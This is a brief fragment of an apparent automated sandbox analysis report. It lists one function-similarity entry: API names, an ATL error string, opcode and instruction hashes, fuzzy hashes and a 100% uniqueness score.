                                  Yara matches
                                  Similarity
                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                  • API String ID: 3511171328-631824599
                                  • Opcode ID: d3ca6fe190a3324d8fb9144065ba4e1630b306d73786647c07b5767b804687e0
                                  • Instruction ID: 9599cf8aca123d5d977a307951b3c56036b386fd34d490796d044b8b94133d3d
                                  • Opcode Fuzzy Hash: d3ca6fe190a3324d8fb9144065ba4e1630b306d73786647c07b5767b804687e0
                                  • Instruction Fuzzy Hash: 99E0C9B0200751ABD721AF69E4047467AE4EB14756F0489ADE846C6744FBB4D5888BB1
                                  Uniqueness

                                  Uniqueness Score: 100.00%